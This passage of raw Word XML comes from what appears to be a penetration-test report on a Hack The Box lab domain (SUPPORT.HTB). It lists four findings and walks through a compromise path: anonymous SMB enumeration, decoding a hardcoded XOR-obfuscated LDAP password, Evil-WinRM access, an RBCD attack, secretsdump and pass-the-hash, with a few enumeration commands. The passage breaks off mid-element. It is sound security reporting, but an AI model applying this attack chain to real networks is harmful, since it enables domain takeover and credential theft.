    <w:p w14:paraId="081D868F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From this standard user position, the domain’s permission structure showed that a low-privileged group held full administrative control over the Domain Controller’s own computer account — a critical misconfiguration that enabled a Resource-Based Constrained Delegation attack, ultimately yielding the credentials of the built-in domain Administrator account and complete control of the domain. Support should treat remediation of this access </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>control misconfiguration as the highest priority, as it represents the single point converting a low-privilege foothold into full domain compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8690" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8691" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc233206065"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Network Penetration Test Assessment Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="081D8692" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The assessor began all testing activities from the perspective of an unauthenticated user on the internal network. No credentials or advance configuration information were provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8693" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc233206066"/>
      <w:r>
        <w:t>Summary of Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="081D8694" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>During the course of testing, the assessor uncovered a total of four (4) findings that pose a material risk to Support’s information systems. The table below provides a summary of the findings by severity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5C3F" w14:paraId="081D869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95" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="234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96" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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97" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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98" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D869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6B0AA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D869A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>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5CBA7"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D869B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>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9E79F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D869C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>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9D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D869F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Table 2: Severity Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86A0" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Below is a high-level overview of each finding identified during testing. These findings are covered in depth in the Technical Findings Details section of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6660"/>
      </w:tblGrid>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D86A4"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A1" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding #</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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A2" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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6A3" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D86A8"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A5" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>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9E79F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D86A6" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9A7D0A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</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A7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Anonymous SMB Share Exposing Sensitive Utility Binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D86AC"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A9" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>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5CBA7"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D86AA" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="AF601A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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AB" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hardcoded / Weakly-Obfuscated Credentials in Distributed Binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D86B0"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AD" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>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5CBA7"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D86AE" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="AF601A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</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AF" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cleartext Credential Stored in Active Directory “info” Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D86B4"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B1" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>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E6B0AA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="081D86B2" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="922B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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B3" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Excessive </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GenericAll</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ACE on Domain Controller Computer Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D86B5" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Table 3: Finding List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86B6" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86B7" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc233206067"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Internal Network Compromise Walkthrough</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="081D86B8" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>During the course of the assessment, the assessor was able to gain a foothold and fully compromise the SUPPORT.HTB Active Directory domain. The steps below demonstrate the path taken from initial access to domain compromise. This is the path of least resistance identified by the assessor; other findings in this report may represent standalone risk but were not required to achieve full compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86B9" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc233206068"/>
      <w:r>
        <w:t>Detailed Walkthrough</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="081D86BA" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The assessor performed the following to fully compromise the SUPPORT.HTB domain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86BB" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The assessor enumerated SMB shares anonymously and identified a non-default share, support-tools, accessible without credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86BC" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Within this share, the assessor located and downloaded UserInfo.exe.zip, an internal .NET utility not intended for unauthenticated access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86BD" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Static analysis of the unzipped binary in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ILSpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> revealed a Protected class implementing a simple, reversible XOR-based obfuscation scheme protecting a hardcoded LDAP service account password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86BE" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The assessor replicated the decryption logic in Python and recovered the cleartext password for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86BF" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using these credentials, the assessor queried Active Directory via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldapsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and discovered that the support domain user account had a cleartext password stored in its info attribute — a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>freetext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> field with no inherent access restrictions, but used here as an unintended credential store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86C0" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The support user was found to be a member of Remote Management Users, granting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> access. The assessor authenticated via Evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and retrieved the user flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86C1" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> enumeration revealed that support was a member of the SHARED SUPPORT ACCOUNTS group, which held a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GenericAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ACE over the Domain Controller’s computer object (DC$).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86C2" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The assessor abused this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GenericAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> permission to perform a Resource-Based Constrained Delegation (RBCD) attack: creating a controlled machine account, configuring RBCD from that account to DC$, and requesting a service ticket impersonating Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86C3" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Using the forged ticket, the assessor performed a targeted secretsdump.py operation to extract the Administrator NT hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86C4" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The assessor authenticated as Administrator via Pass-the-Hash, confirming full domain compromise and retrieving the root flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86C5" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc233206069"/>
      <w:r>
        <w:t>Detailed Reproduction Steps</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="081D86C6" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Upon connecting to the network, the assessor enumerated SMB shares anonymously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86C7"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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nxc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smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.129.11.223 -u '' -p '' --shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86C8" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>A non-default share, support-tools, permitted anonymous listing. The assessor connected and retrieved a suspicious archive:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86CA" w14:textId="42DE74FD" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4" w:rsidP="006B73BF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
          <w:left w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
          <w:bottom w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
          <w:right w:val="single" w:sz="1" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> //10.129.11.223/support-tools -N</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: \&gt; get UserInfo.exe.zip</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>unzip UserInfo.exe.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86CB" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The assessor loaded UserInfo.exe into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ILSpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for static analysis and identified a Protected class implementing the following decryption logic: Base64 decode → XOR with key “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>armando</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” → XOR with 0xDF. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LdapQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> class confirmed this credential was used to bind to LDAP://support.htb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E84A93C" w14:textId="78B02BF3" w:rsidR="00874D64" w:rsidRDefault="003518CC">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1992F0E8" wp14:editId="2447E84A">
            <wp:extent cx="5731510" cy="3105785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18073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3841" name="Picture 180733841"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">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14:paraId="081D86CC" w14:textId="4D55485F" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="006B73BF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ILSpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decompilation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Revealing Protected Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D86CD" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
